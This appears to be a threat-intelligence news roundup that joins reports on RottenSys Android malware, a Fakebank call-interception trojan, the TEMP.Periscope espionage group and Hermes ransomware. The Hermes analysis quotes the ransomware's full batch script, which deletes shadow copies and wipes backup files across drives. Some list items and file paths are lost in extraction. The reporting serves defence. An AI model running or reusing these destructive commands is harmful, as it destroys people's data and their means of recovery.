Since RottenSys has been designed to download and install any new components from its C&C server, attackers can easily weaponize or take full control over millions of infected devices.

The investigation also disclosed some evidence that the RottenSys attackers have already started turning millions of those infected devices into a massive botnet network.

Some infected devices have been found installing a new RottenSys component that gives attackers more extensive abilities, including silently installing additional apps and UI automation.

“Interestingly, a part of the controlling mechanism of the botnet is implemented in Lua scripts. Without intervention, the attackers could re-use their existing malware distribution channel and soon grasp control over millions of devices,” researchers noted.

This is not the first time when CheckPoint researchers found top-notch brands affected with the supply chain attack.

Last year, the firm found smartphone belonging to Samsung, LG, Xiaomi, Asus, Nexus, Oppo, and Lenovo, infected with two pieces of pre-installed malware (Loki Trojan and SLocker mobile ransomware) designed to spy on users.

How to Detect and Remove Android Malware?

To check if your device is being infected with this malware, go to Android system settings→ App Manager, and then look for the following possible malware package names:

  • (每日黄历)
  • com.changmi.launcher (畅米桌面)
  • (系统WIFI服务)
  • com.system.service.zdsgt

If any of above is in the list of your installed apps, simply uninstall it.

Go to Source

New Fakebank Variant Intercepts Calls to Connect Banking Users to Scammers

A new variant of the Fakebank malware can intercept Android users’ banking-related incoming and outgoing calls.

We’ve recently come across a new malicious behavior among apps infected with Android.Fakebank: interception of phone calls made by users to their banks. These apps are sourced from third-party Android markets and some social media sites. We’ve discovered 22 apps so far, targeting Korean bank clients.

The Fakebank variants we’ve seen in the past usually collect bank SMS, record phone calls to banks, and display a fake bank login UI. This new variant, however, is able to intercept calls both incoming and outgoing.

When the app is launched, it collects and submits user’s personal information to a command and control (C&C) server, and presents its display (Figure 1).

Figure 1. Malware UI spoofing a legitimate bank app
Figure 1. Malware UI spoofing a legitimate bank app

The server will respond with configuration specifying the phone numbers that will be used in the scam (Figure 2).

Figure 2. Sample configuration for call interception (numbers have been modified)
Figure 2. Sample configuration for call interception (numbers have been modified)

Four numbers are passed to the malware app:

  • phoneNum_ChangeNum: The legitimate bank’s phone number that will be replaced when the user dials it
  • phoneNum_To: The number of a scammer, ready to impersonate a bank agent. This number will actually be dialed when the user tries to call the bank
  • phoneNum_Come: The number of a scammer that will call the victim. When this number calls the phone, the fake caller ID overlay will appear
  • phoneNum_ShowNum: The legitimate bank number that should be used to overlay the scammer’s incoming/outgoing caller ID

This allows the app to deceive users, when the configured phone numbers appear for an outgoing or incoming call:

  • Outgoing call: When users call a real banking phone number, the malware is able to intercept and transfer the call to the scammer’s configured phone number. Additionally, the app will overlay a fake UI to reflect the legitimate number.
  • Incoming call: When a call comes in from a scammer, the app will overlay a fake UI dialog that spoofs a legitimate bank caller ID and number.

When users call a real banking phone number, the malware is able to intercept and transfer the call to the scammer’s configured phone number. When a call comes in from a scammer, the app will overlay a fake UI dialog that spoofs a legitimate bank caller ID and number.

The APIs and associated permission used to carry out this deception (android.permission.SYSTEM_ALERT_WINDOW) have evolved across Android versions. This malware optimizes its version targets to avoid requesting permissions from the user:

  • For versions prior to Android 6, the permission is required to be declared in the manifest (and will appear in the dialog on install).
  • For Android 6 and Android 7, the permission is granted without prompting the user if the permission is declared in the manifest and the app originates in Google Play. However, this automatic grant is also grandfathered if the target version is set below Android 6. The malware targets Android 5 to gain this permission silently.
  • Starting in Android 8, overlaying a system window from an app is not allowed, and so the malware can’t carry out its deception.

In addition to tricking users into conversations with scammers, this malicious app sends call events to the C&C server. It also has a number of layouts customized to popular phone layouts in Korea.

Figure 3. Handset-specific layouts
Figure 3. Handset-specific layouts

Go to Source
Author: Shaun Aimoto, Martin Zhang

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S.Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service
(FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been
tracking an ongoing wave of intrusions targeting engineering and
maritime entities, especially those connected to South China Sea
issues. The campaign is linked to a group of suspected Chinese cyber
espionage actors we have tracked since 2013, dubbed TEMP.Periscope.
The group has also been reported as “Leviathan
by other security firms.

The current campaign is a sharp escalation of detected activity
since summer 2017. Like multiple other Chinese cyber espionage actors,
TEMP.Periscope has recently re-emerged and has been observed
conducting operations with a revised toolkit. Known targets of this
group have been involved in the maritime industry, as well as
engineering-focused entities, and include research institutes,
academic organizations, and private firms in the United States.
FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on
maritime-related targets across multiple verticals, including
engineering firms, shipping and transportation, manufacturing,
defense, government offices, and research universities. However, the
group has also targeted professional/consulting services, high-tech
industry, healthcare, and media/publishing. Identified victims were
mostly found in the United States, although organizations in Europe
and at least one in Hong Kong have also been affected. TEMP.Periscope
overlaps in targeting, as well as tactics, techniques, and procedures
(TTPs), with TEMP.Jumper, a group that also overlaps significantly
with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a
relatively large library of malware shared with multiple other
suspected Chinese groups. These tools include:

    JavaScript-based backdoor also reported as “Orz” that retrieves
    commands from hidden strings in compromised webpages and actor
    controlled profiles on legitimate services.
    backdoor that is capable of modifying the file system, generating a
    reverse shell, and modifying its command and control (C2)
  • PHOTO: a DLL backdoor also reported publicly
    as “Derusbi”, capable of obtaining directory, file, and drive
    listing; creating a reverse shell; performing screen captures;
    recording video and audio; listing, terminating, and creating
    processes; enumerating, starting, and deleting registry keys and
    values; logging keystrokes, returning usernames and passwords from
    protected storage; and renaming, deleting, copying, moving, reading,
    and writing to files.
  • HOMEFRY: a 64-bit Windows password
    dumper/cracker that has previously been used in conjunction with
    AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with
    XOR x56. The malware accepts up to two arguments at the command
    line: one to display cleartext credentials for each login session,
    and a second to display cleartext credentials, NTLM hashes, and
    malware version for each login session.
    uploader that can exfiltrate files to Dropbox.
    command-line reconnaissance tool. It can be used to execute files as
    a different user, move, and delete files locally, schedule remote AT
    jobs, perform host discovery on connected networks, scan for open
    ports on hosts in a connected network, and retrieve information
    about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes
    Microsoft .NET code within HTTP POST commands. This allows the shell
    to upload and download files, execute applications with web server
    account permissions, list directory contents, access Active
    Directory, access databases, and any other action allowed by the
    .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past
operations and could use again, though these have not been seen in the
current wave of activity:

  • Beacon: a backdoor that
    is commercially available as part of the Cobalt Strike software
    platform, commonly used for pen-testing network environments. The
    malware supports several capabilities, such as injecting and
    executing arbitrary code, uploading and downloading files, and
    executing shell commands.
    a backdoor that obfuscates its communications as normal traffic to
    legitimate websites such as Github and Microsoft’s Technet portal.
    Used by APT17 and
    other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including
    the use of probably compromised email accounts.
  • Lure
    documents using CVE-2017-11882 to drop malware.
  • Stolen code
    signing certificates used to sign malware.
  • Use of
    bitsadmin.exe to download additional tools.
  • Use of
    PowerShell to download additional tools.
  • Using
    C:WindowsDebug and C:Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access
    webshells on internet-facing systems.
  • Using Windows
    Management Instrumentation (WMI)
    for persistence
  • Using Windows Shortcut files (.lnk)
    in the Startup folder that invoke the Windows Scripting Host
    (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the
    adversary on legitimate websites/forums such as Github and
    Microsoft’s TechNet portal.


The current wave of identified intrusions is consistent with
TEMP.Periscope and likely reflects a concerted effort to target
sectors that may yield information that could provide an economic
advantage, research and development data, intellectual property, or an
edge in commercial negotiations.

As we continue to investigate this activity, we may identify
additional data leading to greater analytical confidence linking the
operation to TEMP.Periscope or other known threat actors, as well as
previously unknown campaigns.


x.js 3fefa55daeb167931975c22df3eca20a HOMEFRY, a 64-bit Windows password
mt.exe 40528e368d323db0ac5c3f5e1efe4889 MURKYTOP, a command-line
reconnaissance tool
com4.js a68bf5fce22e7f1d6f999b7a580ae477 AIRBREAK, a JavaScript-based
backdoor which retrieves commands from hidden strings in
compromised webpages

Historical Indicators

green.ddd 3eb6f85ac046a96204096ab65bbd3e7e AIRBREAK, a JavaScript-based
backdoor which retrieves commands from hidden strings in
compromised webpages
BGij 6e843ef4856336fe3ef4ed27a4c792b1 Beacon, a commercially available
msresamn.ttf a9e7539c1ebe857bae6efceefaa9dd16 PHOTO, also reported as
1024-aa6a121f98330df2edee6c4391df21ff43a33604 bd9e4c82bf12c4e7a58221fc52fed705 BADFLICK, backdoor that is capable
of modifying the file system, generating a reverse shell, and
modifying its command-and-control configuration

Go to Source
Author: FireEye

Hermes ransomware distributed to South Koreans via recent Flash zero-day

This blog post was authored by @hasherezade, Jérôme Segura and Vasilios Hioureas.

At the end of January, the South Korean Emergency Response Team (KrCERT) published news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player and below, was distributed via malicious Office documents containing the embedded Flash exploit. Only a couple of weeks after the public announcement, spam campaigns were already beginning to pump out malicious Word documents containing the newly available exploit.

While spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to use an already available Proof-of-Concept and package it as as a drive-by download instead.

On March 9th, MDNC discovered that a less common, but more sophisticated exploit kit called GreenFlash Sundown had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and suspected to be the work of a North Korean hacking group. According to some reports, it may be a decoy attack and “pseudo-ransomware“.

By checking on the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018, (01:54 UTC) via a compromised Korean website.

We replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries part of the self hosted OpenX server. Instead, we found that it was hiding in the main page’s source code.

We had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blurb that went through Base64 and RC4 encoding (we would like to thank David Ledbetter for that).

Hermes ransomware

The payload from this attack is Hermes ransomware, version 2.1.

Behavioral analysis

The ransomware copies itself into %TEMP% under the name svchosta.exe and redeploys itself from that location. The initial sample is then deleted.

The ransomware is not particularly stealthy—some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:

The authors didn’t bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and by this way it tries to force the user into accepting it. But even if we don’t let the batch script be deployed, the main executable proceeds with encryption.

The batch script is responsible for removing the shadow copies and other possible backups:

It is dropped inside C:UsersPublic along with some other files:

The file “PUBLIC” contains a blob with RSA public key. It is worth noting that this key is unique on each run, so, the RSA key pair is generated per victim. Example:

Another file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:

Analyzing the blob header, we find the following information:

The rest of the data is encrypted—at this moment, we can guess that it is encrypted by the RSA public key of the attackers.

The same folder also contains a ransom note. When the encryption finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.

The interesting fact is that, depending on the campaign, in some of the samples the authors used BitMessage to communicate with victims:

This method was used in the past by a few other authors, for example in Chimera ransomware, and by the author of original Petya in his affiliate programs.

Encrypted files don’t have their names changed. Each file is encrypted with a new key—the same plaintext produces various ciphertext. The entropy of the encrypted file is high, and no patterns are visible. That suggests that some stream cipher or a cipher with chained blocks was used. (The most commonly used in such cases is AES in CBC mode, but we can be sure only after analyzing the code). Below, you can see a visualization of a BMP file before and after being encrypted by Hermes:


Inside each file, after the encrypted content, there is a “HERMES” marker, followed by another blob:

This time the blob contains an exported session key (0x01 : SIMPLEBLOB) and the algorithm identifier is AES (0x6611: CALG_AES). We can make an educated guess that it is the AES key for the file, encrypted by the victim’s RSA key (from the generated pair).

The ransomware achieves persistence by dropping a batch script in the Startup folder:

The script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.

So, on each system startup it will make a check for new, unencrypted files and try to encrypt them. That’s why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry in order to not let the attack repeat itself.

Inside the ransomware

Execution flow

At the beginning of the execution, the ransomware creates a mutex named “tech”:

The sample is mildly obfuscated, for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during the execution, so, at first we will not see the typical strings.

First, the executable begins to dynamically load all its imports via a function at 4023e0:

It then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian are found as the system language, it exits the process (0x419 being Russian, 422 Ukrainian, and 423 Belarusian).

It then creates two subprocesses – cmd.exe. One that copies itself into directory appdata/local/temp/svchost.exe, and another that executes the copied file.

It also generates crypto keys using standard CryoptAquireCOntext libraries, and saves the public key and some kind of ID into the following files:



As mentioned earlier, it writes out a script to auto run on startup with contents: start “” %TEMP%svchosta.exe into the Start menu startup folder. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved out the public key into a file so that it can later find that key and continue encrypting using a consistent key throughout all executions.

Below is the function that calls all of this functionality sequentially, labeled:

It proceeds to cycle all available drives. If it is CDRom, it will skip it. Inside the function, it goes through all files and folders on the drive, but skips a few key directories, not limited to Windows, Mozilla, and the recycling bin.

Inside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:

It then continues on to enumerate netResources and encrypts those files as well. After encryption, it creates another bat file called window.bat to delete shadow volume and backup files. Here is its content:

vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:backup*.* c:*.set c:*.win c:*.dsk
del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:backup*.* d:*.set d:*.win d:*.dsk
del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:backup*.* e:*.set e:*.win e:*.dsk
del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:backup*.* f:*.set f:*.win f:*.dsk
del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:backup*.* g:*.set g:*.win g:*.dsk
del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:backup*.* h:*.set h:*.win h:*.dsk
del %0

It then creates and executes another bat file called svchostaaexe.bat that cycles through the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware looking in so much detail for backup files.

There is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which contains the unique ID you have to send to the email address, must be encrypted by a public key pair that the attackers have pre-generated and retained on their side.

We have found that there is a heavy code reuse from the old versions of Hermes with this one. The flow of the code looks to be a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.

Below are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.

The new version:

And the old version 237eee069c1df7b69cee2cc63dee24e6:

Attacked targets

The ransomware attacks the following extensions:

tif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat


Hermes, like many other ransomware, uses AES along with RSA for the encryption. AES is used to encrypt files with a random key. RSA is used to protect the random AES key.

The ransomware uses two RSA key pairs, one being a RSA hardcoded public key for the attackers.

Then, there is a keypair for the victim. It is generated at the beginning of the attack. The private key from this key pair is encrypted by the attackers’ public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.

When the victim sends this file, the attackers can recover the victim’s private key with the help of their own private key. The victim’s public key is stored in PUBLIC in clear text. It is later used to encrypt random AES keys, generated per file.

Cryptography is implemented with the help of Windows Crypto API. Function calls are mildly obfuscated, and pointers to the functions are manually loaded.

Each file processing starts from checking if it was already encrypted. The ransomware uses the saved marker “HERMES” that we already saw during the behavioral analysis. The marker is stored at the end of the file, before the block where the AES key is saved. Its offset is 274 bytes from the end. So, first the file pointer is set at this position to make a check of the characters.

If the marker was found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the responsible function. Unfortunately for the victims, the authors used the secure function CryptGenKey:

The used identifier for the algorithm is 0x6610 (CALG_AES_256). That means 256-bit is using AES encryption. This key is used to encrypt the content of the file. The file is read and encrypted in chunks, with 1,000,000 bytes each.

At the end, the marker “HERMES” is written and the exported AES key is saved:

The handle to the attacker’s RSA public key is passed, so the function CryptExportKey automatically takes care of protecting the AES key. Only the owner of the RSA private key will be able to import it back.


Malwarebytes users are  protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.


Another campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware—namely Magniber. That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.

After analyzing the sample, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.

Although the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.

Indicators of compromise

Domains involved in campaign:

  • 2018-02-27 (01:54 UTC)
    • staradvertsment[.]com
    • hunting.bannerexposure[.]info
  • 2018-02-28
    • staradvertsment[.]com
    • accompanied.bannerexposure[.]info
  • 2018-03-01
    • switzerland.innovativebanner[.]info
  • 2018-03-07
    • name.secondadvertisements[.]com
  • 2018-03-08
    • assessed.secondadvertisements[.]com
    • marketing.roadadvertisements[.]com
  • 2018-03-09
    • bannerssale[.]com
    • aquaadvertisement[.]com
    • technologies.roadadvertisements[.]com

IP addresses:

  • 159.65.131[.]94
  • 159.65.131[.]94
  • 207.148.104[.]5

Hermes 2.1 ransomware:

  • A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2
  • pretty040782@gmail[.]com
  • pretty040782@keemail[.]me

The post Hermes ransomware distributed to South Koreans via recent Flash zero-day appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs